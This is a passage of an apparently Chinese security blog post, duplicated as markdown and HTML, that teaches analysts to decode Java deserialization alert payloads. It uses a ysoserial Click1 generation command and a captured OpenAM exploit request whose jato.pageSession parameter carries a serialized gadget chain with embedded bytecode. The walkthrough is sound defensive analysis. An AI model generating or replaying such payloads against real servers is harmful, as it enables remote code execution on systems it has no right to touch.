KY29sdW1uTGlzdHQAEExqYXZhL3V0aWwvTGlzdDtMAAdjb2x1bW5zcQB-AAdMAAtjb250cm9sTGlua3QAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvQWN0aW9uTGluaztMAAtjb250cm9sTGlzdHEAfgAQTAAMZGF0YVByb3ZpZGVydAAsTG9yZy9hcGFjaGUvY2xpY2svZGF0YXByb3ZpZGVyL0RhdGFQcm92aWRlcjtMAAZoZWlnaHRxAH4ACEwACXBhZ2luYXRvcnQAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvUmVuZGVyYWJsZTtMAAdyb3dMaXN0cQB-ABBMAAxzb3J0ZWRDb2x1bW5xAH4ACEwABXdpZHRocQB-AAh4cgAob3JnLmFwYWNoZS5jbGljay5jb250cm9sLkFic3RyYWN0Q29udHJvbAAAAAAAAAABAgAJTAAOYWN0aW9uTGlzdGVuZXJ0ACFMb3JnL2FwYWNoZS9jbGljay9BY3Rpb25MaXN0ZW5lcjtMAAphdHRyaWJ1dGVzcQB-AAdMAAliZWhhdmlvcnN0AA9MamF2YS91dGlsL1NldDtMAAxoZWFkRWxlbWVudHNxAH4AEEwACGxpc3RlbmVydAASTGphdmEvbGFuZy9PYmplY3Q7TAAObGlzdGVuZXJNZXRob2RxAH4ACEwABG5hbWVxAH4ACEwABnBhcmVudHEAfgAXTAAGc3R5bGVzcQB-AAd4cHBwcHBwcHBwcAAAAAIAAQAAAAAAAAAAAAAAAQAAAAAAAAAAAXBzcgATamF2YS51dGlsLkFycmF5TGlzdHiB0h2Zx2GdAwABSQAEc2l6ZXhwAAAAAHcEAAAAAHhzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHhwcHBwcHBwcHBwdwQAAAADc3IAOmNvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRlbXBsYXRlc0ltcGwJV0_BbqyrMwMABkkADV9pbmRlbnROdW1iZXJJAA5fdHJhbnNsZXRJbmRleFsACl9ieXRlY29kZXN0AANbW0JbAAZfY2xhc3N0ABJbTGphdmEvbGFuZy9DbGFzcztMAAVfbmFtZXEAfgAITAARX291dHB1dFByb3BlcnRpZXN0ABZMamF2YS91dGlsL1Byb3BlcnRpZXM7eHAAAAAA_____3VyAANbW0JL_RkVZ2fbNwIAAHhwAAAAAnVyAAJbQqzzF_gGCFTgAgAAeHAAAAa1yv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk_OR3e8-AQAGPGluaXQ-AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1b
|
|||
|
|
Host: 10.162.147.159:9200
|
|||
|
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0
|
|||
|
|
Accept-Encoding: gzip, deflate
|
|||
|
|
Accept: */*
|
|||
|
|
Connection: keep-alive
|
|||
|
|
Content-Type: application/xml
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
扣出其中`jato.pageSession` 参数的值,保存成`target.bin`
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
先处理替换和等号的问题
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
cat target.bin | tr '_-' '/+' > target_lack_equal.bin
|
|||
|
|
./add_equal.sh target_lack_equal.bin > target_base64.bin
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
这里的`add.equal.sh`简单修改一下,支持传入文件名字
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
#!/bin/bash
|
|||
|
|
|
|||
|
|
if [ "$#" -ne 1 ]; then
|
|||
|
|
echo "Usage: $0 "
|
|||
|
|
exit 1
|
|||
|
|
fi
|
|||
|
|
|
|||
|
|
filename="$1"
|
|||
|
|
|
|||
|
|
if [ ! -f "$filename" ]; then
|
|||
|
|
echo "File '$filename' not found."
|
|||
|
|
exit 1
|
|||
|
|
fi
|
|||
|
|
|
|||
|
|
file_content=$(cat "$filename") # 读取文件内容
|
|||
|
|
|
|||
|
|
# 移除可能存在的换行符
|
|||
|
|
base64_string=$(echo -n "$file_content" | tr -d '\n')
|
|||
|
|
|
|||
|
|
# 计算base64编码字符串长度
|
|||
|
|
length=${#base64_string}
|
|||
|
|
|
|||
|
|
# 计算需要补充的等号数量
|
|||
|
|
remainder=$((length % 4))
|
|||
|
|
padding=$(((4 - remainder) % 4))
|
|||
|
|
|
|||
|
|
# 补充等号
|
|||
|
|
if ((padding &gt; 0)); then
|
|||
|
|
padding_string=$(printf '=%.0s' $(seq 1 $padding))
|
|||
|
|
base64_string="$base64_string$padding_string"
|
|||
|
|
fi
|
|||
|
|
|
|||
|
|
echo "$base64_string"
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
然后处理base64和开头的`00`的问题
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
cat target_base64.bin | base64 -d > target_00.bin
|
|||
|
|
tail -c +2 target_00.bin > restore.bin
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
然后就是用zkar解析一波
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
./zkar dump -f restore.bin > restore.txt
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
将中间反序列化部分扣出来,保存成ser\_hex.txt
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
然后执行下面的脚本保存成class文件:
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
import re
|
|||
|
|
import sys
|
|||
|
|
|
|||
|
|
def remove_hex_line(input_string):
|
|||
|
|
pattern = re.compile(r'[0-9a-fA-F]{8}')
|
|||
|
|
return re.sub(pattern, '', input_string)
|
|||
|
|
|
|||
|
|
def remove_vertical_line(input_string):
|
|||
|
|
pattern = re.compile(r'\|.*\|')
|
|||
|
|
return re.sub(pattern, '', input_string)
|
|||
|
|
|
|||
|
|
def extract_hex_to_file(input_filename, output_filename):
|
|||
|
|
with open(input_filename, "r") as file:
|
|||
|
|
input_text = file.read()
|
|||
|
|
|
|||
|
|
input_text = remove_hex_line(input_text)
|
|||
|
|
input_text = remove_vertical_line(input_text)
|
|||
|
|
hex_data = re.findall(r"[0-9a-fA-F]{2}(?: [0-9a-fA-F]{2})*", input_text)
|
|||
|
|
hex_string = "".join(hex_data).replace(" ", "")
|
|||
|
|
|
|||
|
|
with open(output_filename, "wb") as file:
|
|||
|
|
file.write(bytes.fromhex(hex_string))
|
|||
|
|
|
|||
|
|
if __name__ == "__main__":
|
|||
|
|
if len(sys.argv) != 3:
|
|||
|
|
print("Usage: python3 extract_hex.py input_filename output_filename")
|
|||
|
|
sys.exit(1)
|
|||
|
|
|
|||
|
|
input_filename = sys.argv[1]
|
|||
|
|
output_filename = sys.argv[2]
|
|||
|
|
|
|||
|
|
extract_hex_to_file(input_filename, output_filename)
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
python3 extract_hex.py ser_hex.txt restore.class
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
拿到class,然后丢到idea中,自己反编译了
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
0x05 后言
|
|||
|
|
-------
|
|||
|
|
|
|||
|
|
在分析的时候,发现 ysoserial 两次生成Payload会不一样的。。。卡了我好一会。。。
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
虽然分析没问题,但是步骤略微繁琐,后续有空,可以考虑整合成一个工具,自动解码。
|
|||
|
|
|
|||
|
|
</textarea>
|
|||
|
|
<div id=layer-photos-demo>
|
|||
|
|
<div id=md_view><div class=markdown-body><h2 blockindex=0>0x00 前言</h2>
|
|||
|
|
<p blockindex=1>小伙伴在分析告警的时候,发现反序列化告警,Payload类似<code>AKztAA</code>,不知道咋解,于是有了本文。</p>
|
|||
|
|
<h2 blockindex=2>0x01 文件头</h2>
|
|||
|
|
<p blockindex=3>开始之前,先来复习一些涉及到的一些文件头</p>
|
|||
|
|
<p blockindex=4>以<code>rO0AB</code>开头,java序列化base64编码的数据<br>
|
|||
|
|
以<code>aced</code>开头,java序列化的16进制<br>
|
|||
|
|
以上两个,都可以用 <a href=https://github.com/phith0n/zkar>https://github.com/phith0n/zkar</a> 和<a href=https://github.com/NickstaDB/SerializationDumper>https://github.com/NickstaDB/SerializationDumper</a> 去解析</p>
|
|||
|
|
<p blockindex=5>以<code>cafebabe</code>开头,java class文件的16进制,保存成class,拖到idea中反编译</p>
|
|||
|
|
<p blockindex=6>有了这些文件头信息,下面就可以开始用ysoserial.jar生成Payload了</p>
|
|||
|
|
<h2 blockindex=7>0x02 原始payload</h2>
|
|||
|
|
<p blockindex=8>生成Payload</p>
|
|||
|
|
<pre blockindex=9><code class="hljs language-bash">java -jar ysoserial.jar Click1 <span class=hljs-string>"touch /tmp/xx"</span> > raw_payload.bin
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=10><img src=
|
|||
|
|
<p blockindex=11>查看生成的Payload的十六进制</p>
|
|||
|
|
<pre blockindex=12><code class="hljs language-bash">hexdump -C raw_payload.bin
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=13><img src=
|
|||
|
|
<p blockindex=14>显然,以<code>aced</code>开头,java序列化的16进制,使用<code>zkar解析</code></p>
|
|||
|
|
<pre blockindex=15><code class="hljs language-bash">./zkar dump -f raw_payload.bin > raw_payload_decode.txt
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=16>然后查看生成的文件,应该可以找到下图:</p>
|
|||
|
|
<p blockindex=17><img src="
|
|||
|
|
<p blockindex=18>以<code>cafebabe</code>开头,java class文件的16进制,保存成class,拖到idea中反编译即可。</p>
|
|||
|
|
<h2 blockindex=19>0x03 编码替换的Payload</h2>
|
|||
|
|
<p blockindex=20>我们在日常分析的时候,java反序列化的漏洞,可能看到的是下面的<code>AKztAAV</code>开头的Payload,对于这类Payload的解码流程,基本上就是先补等号,替换<code>_</code>和<code>-</code>为<code>/</code>和<code>+</code>,然后base64解码,跳过开头的空字符,最后的结果丢给zkar解析就行。如果zkar解析出来有看到<code>ca fe</code>开头的十六进制,就把它提取出来,保存成class文件,最后将class文件丢给idea反编译,即可看到攻击者最终想要执行的命令了。有点乱?没关系,下面我们会一步步分析。</p>
|
|||
|
|
<p blockindex=21><img src=
|
|||
|
|
<p blockindex=22>这种Payload 一般执行如下命令:</p>
|
|||
|
|
<pre blockindex=23><code class="hljs language-bash">java -jar ysoserial.jar Click1 <span class=hljs-string>"touch /tmp/xx"</span> | (<span class=hljs-built_in>echo</span> -ne \\x00 && cat) | base64 | tr <span class=hljs-string>'/+'</span> <span class=hljs-string>'_-'</span> | tr -d <span class=hljs-string>'='</span>
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=24>命令的意思是,使用<code>ysoserial.jar</code>生成一个指定<code>Click1</code>这个gadget 去执行<code>touch /tmp/xx</code>命令的序列化的Payload,然后在该Payload的前面插入一个空字节(<code>\x00</code>),之后对其进行base64编码,编码后的内容,将<code>/</code> 替换为 <code>_</code>,和 <code>+</code> 替换为 <code>-</code>,最后将<code>=</code>去掉。</p>
|
|||
|
|
<p blockindex=25>> 替换<code>/</code>和<code>+</code>是因为 base64 编码的输出可能包含 <code>/</code> 和 <code>+</code> 字符,这些字符在 URL 中有特殊含义,因此需要替换成其他字符以避免问题。</p>
|
|||
|
|
<p blockindex=26>拆开如下:</p>
|
|||
|
|
<pre blockindex=27><code class="hljs language-bash">java -jar ysoserial.jar Click1 <span class=hljs-string>"touch /tmp/xx"</span> > raw_payload.bin
|
|||
|
|
cat raw_payload.bin | (<span class=hljs-built_in>echo</span> -ne \\x00 && cat) > raw_payload_00.bin
|
|||
|
|
cat raw_payload_00.bin | base64 > raw_payload_00_base64.bin
|
|||
|
|
cat raw_payload_00_base64.bin | tr <span class=hljs-string>'/+'</span> <span class=hljs-string>'_-'</span> | tr -d <span class=hljs-string>'='</span> > raw_payload_00_base64_replace.bin
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=28>因此,我们反着来,即可一步步还原,先处理第四步,替换和等号的问题,等号需要根据字符串长度补充</p>
|
|||
|
|
<pre blockindex=29><code class="hljs language-bash">cat raw_payload_00_base64_replace.bin | tr <span class=hljs-string>'_-'</span> <span class=hljs-string>'/+'</span> > restore_raw_payload_00_base64_replace_lack_equal.bin
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=30>然后执行下面的shell脚本</p>
|
|||
|
|
<pre blockindex=31><code class="hljs language-bash"><span class=hljs-meta>#!/bin/bash</span>
|
|||
|
|
|
|||
|
|
file_content=$(cat restore_raw_payload_00_base64_replace_lack_equal.bin)
|
|||
|
|
|
|||
|
|
<span class=hljs-comment># 移除可能存在的换行符</span>
|
|||
|
|
base64_string=$(<span class=hljs-built_in>echo</span> -n <span class=hljs-string>"<span class=hljs-variable>$file_content</span>"</span> | tr -d <span class=hljs-string>'\n'</span>)
|
|||
|
|
|
|||
|
|
<span class=hljs-comment># 计算base64编码字符串长度</span>
|
|||
|
|
length=<span class=hljs-variable>${#base64_string}</span>
|
|||
|
|
|
|||
|
|
<span class=hljs-comment># 计算需要补充的等号数量</span>
|
|||
|
|
remainder=$((length % <span class=hljs-number>4</span>))
|
|||
|
|
padding=$(((<span class=hljs-number>4</span> - remainder) % <span class=hljs-number>4</span>))
|
|||
|
|
|
|||
|
|
<span class=hljs-comment># 补充等号</span>
|
|||
|
|
<span class=hljs-keyword>if</span> ((padding &gt; 0)); <span class=hljs-keyword>then</span>
|
|||
|
|
padding_string=$(<span class=hljs-built_in>printf</span> <span class=hljs-string>'=%.0s'</span> $(seq 1 <span class=hljs-variable>$padding</span>))
|
|||
|
|
base64_string=<span class=hljs-string>"$base64_string<span class=hljs-variable>$padding_string</span>"</span>
|
|||
|
|
<span class=hljs-keyword>fi</span>
|
|||
|
|
|
|||
|
|
<span class=hljs-built_in>echo</span> <span class=hljs-string>"<span class=hljs-variable>$base64_string</span>"</span>
|
|||
|
|
</code></pre>
|
|||
|
|
<pre blockindex=32><code class="hljs language-bash">./add_equal.sh > restore_raw_payload_00_base64_replace.bin
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=33>这时候我们可以比对一下,看看是否还原成功</p>
|
|||
|
|
<p blockindex=34><img src="
|
|||
|
|
<p blockindex=35>接下来开始还原第三步,base64解码即可:</p>
|
|||
|
|
<pre blockindex=36><code class="hljs language-bash">cat restore_raw_payload_00_base64_replace.bin | base64 -d > restore_raw_payload_00.bin
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=37><img src=
|
|||
|
|
<p blockindex=38>然后是第二步,跳过开头的空字节:</p>
|
|||
|
|
<pre blockindex=39><code class="hljs language-bash">tail -c +2 restore_raw_payload_00.bin > restore_raw_payload.bin
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=40><img src="
|
|||
|
|
<p blockindex=41>最后就是拿过去让<code>zkar</code>解析了,这里不再重复了</p>
|
|||
|
|
<h2 blockindex=42>0x04 实战</h2>
|
|||
|
|
<p blockindex=43>拿到攻击者的请求:</p>
|
|||
|
|
<pre blockindex=44><code class="hljs language-bash">GET /openam/oauth2/..;/ccversion/Version?jato.pageSession=AKztAAVzcgAXamF2YS51dGlsLlByaW9yaXR5UXVldWWU2jC0-z-CsQMAAkkABHNpemVMAApjb21wYXJhdG9ydAAWTGphdmEvdXRpbC9Db21wYXJhdG9yO3hwAAAAAnNyADBvcmcuYXBhY2hlLmNsaWNrLmNvbnRyb2wuQ29sdW1uJENvbHVtbkNvbXBhcmF0b3IAAAAAAAAAAQIAAkkADWFzY2VuZGluZ1NvcnRMAAZjb2x1bW50ACFMb3JnL2FwYWNoZS9jbGljay9jb250cm9sL0NvbHVtbjt4cAAAAAFzcgAfb3JnLmFwYWNoZS5jbGljay5jb250cm9sLkNvbHVtbgAAAAAAAAABAgATWgAIYXV0b2xpbmtaAAplc2NhcGVIdG1sSQAJbWF4TGVuZ3RoTAAKYXR0cmlidXRlc3QAD0xqYXZhL3V0aWwvTWFwO0wACmNvbXBhcmF0b3JxAH4AAUwACWRhdGFDbGFzc3QAEkxqYXZhL2xhbmcvU3RyaW5nO0wACmRhdGFTdHlsZXNxAH4AB0wACWRlY29yYXRvcnQAJExvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvRGVjb3JhdG9yO0wABmZvcm1hdHEAfgAITAALaGVhZGVyQ2xhc3NxAH4ACEwADGhlYWRlclN0eWxlc3EAfgAHTAALaGVhZGVyVGl0bGVxAH4ACEwADW1lc3NhZ2VGb3JtYXR0ABlMamF2YS90ZXh0L01lc3NhZ2VGb3JtYXQ7TAAEbmFtZXEAfgAITAAIcmVuZGVySWR0ABNMamF2YS9sYW5nL0Jvb2xlYW47TAAIc29ydGFibGVxAH4AC0wABXRhYmxldAAgTG9yZy9hcGFjaGUvY2xpY2svY29udHJvbC9UYWJsZTtMAA10aXRsZVByb3BlcnR5cQB-AAhMAAV3aWR0aHEAfgAIeHAAAQAAAABwcHBwcHBwcHBwdAAQb3V0cHV0UHJvcGVydGllc3Bwc3IAHm9yZy5hcGFjaGUuY2xpY2suY29udHJvbC5UYWJsZQAAAAAAAAABAgAXSQAOYmFubmVyUG9zaXRpb25aAAlob3ZlclJvd3NaABdudWxsaWZ5Um93TGlzdE9uRGVzdHJveUkACnBhZ2VOdW1iZXJJAAhwYWdlU2l6ZUkAE3BhZ2luYXRvckF0dGFjaG1lbnRaAAhyZW5kZXJJZEkACHJvd0NvdW50WgAKc2hvd0Jhbm5lcloACHNvcnRhYmxlWgAGc29ydGVkWgAPc29ydGVkQXNjZW5kaW5nTAAHY2FwdGlvbnEAfgAITAAKY29sdW1uTGlzdHQAEExqYXZhL3V0aWwvTGlzdDtMAAdjb2x1bW5zcQB-AAdMAAtjb250cm9sTGlua3QAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvQWN0aW9uTGluaztMAAtjb250cm9sTGlzdHEAfgAQTAAMZGF0YVByb3ZpZGVydAAsTG9yZy9hcGFjaGUvY2xpY2svZGF0YXByb3ZpZGVyL0RhdGFQcm92aWRlcjtMAAZoZWlnaHRxAH4ACEwACXBhZ2luYXRvcnQAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvUmVuZGVyYWJsZTtMAAdyb3dMaXN0cQB-ABBMAAxzb3J0ZWRDb2x1bW5xAH4ACEwABXdpZHRocQB-AAh4cgAob3JnLmFwYWNoZS5jbGljay5jb250cm9sLkFic3RyYWN0Q29udHJvbAAAAAAAAAABAgAJTAAOYWN0aW9uTGlzdGVuZXJ0ACFMb3JnL2FwYWNoZS9jbGljay9BY3Rpb25MaXN0ZW5lcjtMAAphdHRyaWJ1dGVzcQB-AAdMAAliZWhhdmlvcnN0AA9MamF2YS91dGlsL1NldDtMAAxoZWFkRWxlbWVudHNxAH4AEEwACGxpc3RlbmVydAASTGphdmEvbGFuZy9PYmplY3Q7TAAObGlzdGVuZXJNZXRob2RxAH4ACEwABG5hbWVxAH4ACEwABnBhcmVudHEAfgAXTAAGc3R5bGVzcQB-AAd4cHBwcHBwcHBwcAAAAAIAAQAAAAAAAAAAAAAAAQAAAAAAAAAAAXBzcgATamF2YS51dGlsLkFycmF5TGlzdHiB0h2Zx2GdAwABSQAEc2l6ZXhwAAAAAHcEAAAAAHhzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHhwcHBwcHBwcHBwdwQAAAADc3IAOmNvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRlbXBsYXRlc0ltcGwJV0_BbqyrMwMABkkADV9pbmRlbnROdW1iZXJJAA5fdHJhbnNsZXRJbmRleFsACl9ieXRlY29kZXN0AANbW0JbAAZfY2xhc3N0ABJbTGphdmEvbGFuZy9DbGFzcztMAAVfbmFtZXEAfgAITAARX291dHB1dFByb3BlcnRpZXN0ABZMamF2YS91dGlsL1Byb3BlcnRpZXM7eHAAAAAA_____3VyAANbW0JL_RkVZ2fbNwIAAHhwAAAAAnVyAAJbQqzzF_gGCFTgAgAAeHAAAAa1yv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk_OR3e8-AQAGPGluaXQ-AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUc
|
|||
|
|
Host: 10.162.147.159:9200
|
|||
|
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0
|
|||
|
|
Accept-Encoding: gzip, deflate
|
|||
|
|
Accept: */*
|
|||
|
|
Connection: keep-alive
|
|||
|
|
Content-Type: application/xml
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=45>扣出其中<code>jato.pageSession</code> 参数的值,保存成<code>target.bin</code></p>
|
|||
|
|
<p blockindex=46><img src="
|
|||
|
|
<p blockindex=47>先处理替换和等号的问题</p>
|
|||
|
|
<pre blockindex=48><code class="hljs language-bash">cat target.bin | tr <span class=hljs-string>'_-'</span> <span class=hljs-string>'/+'</span> > target_lack_equal.bin
|
|||
|
|
./add_equal.sh target_lack_equal.bin > target_base64.bin
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=49>这里的<code>add.equal.sh</code>简单修改一下,支持传入文件名字</p>
|
|||
|
|
<pre blockindex=50><code class="hljs language-bash"><span class=hljs-meta>#!/bin/bash</span>
|
|||
|
|
|
|||
|
|
<span class=hljs-keyword>if</span> [ <span class=hljs-string>"<span class=hljs-variable>$#</span>"</span> -ne 1 ]; <span class=hljs-keyword>then</span>
|
|||
|
|
<span class=hljs-built_in>echo</span> <span class=hljs-string>"Usage: <span class=hljs-variable>$0</span> "</span>
|
|||
|
|
<span class=hljs-built_in>exit</span> 1
|
|||
|
|
<span class=hljs-keyword>fi</span>
|
|||
|
|
|
|||
|
|
filename=<span class=hljs-string>"<span class=hljs-variable>$1</span>"</span>
|
|||
|
|
|
|||
|
|
<span class=hljs-keyword>if</span> [ ! -f <span class=hljs-string>"<span class=hljs-variable>$filename</span>"</span> ]; <span class=hljs-keyword>then</span>
|
|||
|
|
<span class=hljs-built_in>echo</span> <span class=hljs-string>"File '<span class=hljs-variable>$filename</span>' not found."</span>
|
|||
|
|
<span class=hljs-built_in>exit</span> 1
|
|||
|
|
<span class=hljs-keyword>fi</span>
|
|||
|
|
|
|||
|
|
file_content=$(cat <span class=hljs-string>"<span class=hljs-variable>$filename</span>"</span>) <span class=hljs-comment># 读取文件内容</span>
|
|||
|
|
|
|||
|
|
<span class=hljs-comment># 移除可能存在的换行符</span>
|
|||
|
|
base64_string=$(<span class=hljs-built_in>echo</span> -n <span class=hljs-string>"<span class=hljs-variable>$file_content</span>"</span> | tr -d <span class=hljs-string>'\n'</span>)
|
|||
|
|
|
|||
|
|
<span class=hljs-comment># 计算base64编码字符串长度</span>
|
|||
|
|
length=<span class=hljs-variable>${#base64_string}</span>
|
|||
|
|
|
|||
|
|
<span class=hljs-comment># 计算需要补充的等号数量</span>
|
|||
|
|
remainder=$((length % <span class=hljs-number>4</span>))
|
|||
|
|
padding=$(((<span class=hljs-number>4</span> - remainder) % <span class=hljs-number>4</span>))
|
|||
|
|
|
|||
|
|
<span class=hljs-comment># 补充等号</span>
|
|||
|
|
<span class=hljs-keyword>if</span> ((padding &gt; 0)); <span class=hljs-keyword>then</span>
|
|||
|
|
padding_string=$(<span class=hljs-built_in>printf</span> <span class=hljs-string>'=%.0s'</span> $(seq 1 <span class=hljs-variable>$padding</span>))
|
|||
|
|
base64_string=<span class=hljs-string>"$base64_string<span class=hljs-variable>$padding_string</span>"</span>
|
|||
|
|
<span class=hljs-keyword>fi</span>
|
|||
|
|
|
|||
|
|
<span class=hljs-built_in>echo</span> <span class=hljs-string>"<span class=hljs-variable>$base64_string</span>"</span>
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=51>然后处理base64和开头的<code>00</code>的问题</p>
|
|||
|
|
<pre blockindex=52><code class="hljs language-bash">cat target_base64.bin | base64 -d > target_00.bin
|
|||
|
|
tail -c +2 target_00.bin > restore.bin
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=53>然后就是用zkar解析一波</p>
|
|||
|
|
<pre blockindex=54><code class="hljs language-bash">./zkar dump -f restore.bin > restore.txt
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=55>将中间反序列化部分扣出来,保存成ser_hex.txt</p>
|
|||
|
|
<p blockindex=56><img src="
|
|||
|
|
<p blockindex=57><img src=
|
|||
|
|
<p blockindex=58>然后执行下面的脚本保存成class文件:</p>
|
|||
|
|
<pre blockindex=59><code class="hljs language-bash">import re
|
|||
|
|
import sys
|
|||
|
|
|
|||
|
|
def remove_hex_line(input_string):
|
|||
|
|
